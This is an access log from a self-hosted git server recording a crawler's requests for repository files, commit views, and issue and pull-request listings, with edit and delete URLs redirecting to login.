"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14386] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80961] [Gzip 29.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9820] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:18:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 81116] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 12058] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:18:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 